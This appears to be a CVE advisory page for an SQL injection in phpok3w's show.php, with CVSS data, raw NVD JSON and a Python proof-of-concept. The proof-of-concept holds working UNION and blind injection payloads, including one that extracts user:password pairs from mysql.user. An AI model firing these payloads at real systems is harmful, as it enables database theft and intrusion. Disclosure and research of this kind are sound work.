Security Vulnerability Report
CVE-2025-15142 CVSS 7.3 HIGH

CVE-2025-15142

Published: 2025-12-28 16:15:51
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was identified in 9786 phpok3w up to 901d96a06809fb28b17f3a4362c59e70411c933c. An unknown function of the file show.php is affected. Manipulation of the argument ID leads to SQL injection. The attack can be initiated remotely. An exploit is publicly available and might be used. This product uses a rolling release to provide continuous delivery; therefore, no version details are available for affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS 3.1 Base Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

phpok3w <= 901d96a06809fb28b17f3a4362c59e70411c933c

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-15142 PoC - phpok3w SQL Injection in show.php # Target: phpok3w show.php file with vulnerable ID parameter target_url = "http://target.com/show.php" # SQL Injection Payloads for different extraction purposes # 1. Basic injection test - check if vulnerable payload_basic = "1' OR '1'='1" # 2. Database version extraction using UNION-based injection payload_db_version = "1' UNION SELECT NULL,@@version,NULL,NULL,NULL-- -" # 3. Database name extraction payload_db_name = "1' UNION SELECT NULL,database(),NULL,NULL,NULL-- -" # 4. User table credentials extraction (MySQL/MariaDB) payload_users = "1' UNION SELECT NULL,CONCAT(user,':',password),NULL,NULL,NULL FROM mysql.user-- -" # 5. All database names extraction payload_all_dbs = "1' UNION SELECT NULL,GROUP_CONCAT(schema_name),NULL,NULL,NULL FROM information_schema.schemata-- -" # 6. Time-based blind injection for data extraction payload_blind = "1' AND (SELECT IF(1=1,SLEEP(5),0))-- -" def test_vulnerability(): """Test basic SQL injection vulnerability""" params = {'id': payload_basic} try: response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: print(f"[+] Target appears to be vulnerable to SQL injection") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False def extract_db_info(): """Extract database version and name""" version_params = {'id': payload_db_version} name_params = {'id': payload_db_name} try: version_resp = requests.get(target_url, params=version_params, timeout=10) name_resp = requests.get(target_url, params=name_params, timeout=10) print(f"[+] Database version: {version_resp.text}") print(f"[+] Database name: {name_resp.text}") except requests.RequestException as e: print(f"[-] Extraction failed: {e}") if __name__ == "__main__": print("CVE-2025-15142 phpok3w SQL Injection PoC") print("=" * 50) test_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15142", "sourceIdentifier": "[email protected]", "published": "2025-12-28T16:15:50.900", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in 9786 phpok3w up to 901d96a06809fb28b17f3a4362c59e70411c933c. Impacted is an unknown function of the file show.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://gitee.com/9786/phpok3w/issues/IDD1IZ", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.338520", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.338520", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.715574", "source": "[email protected]"}]}}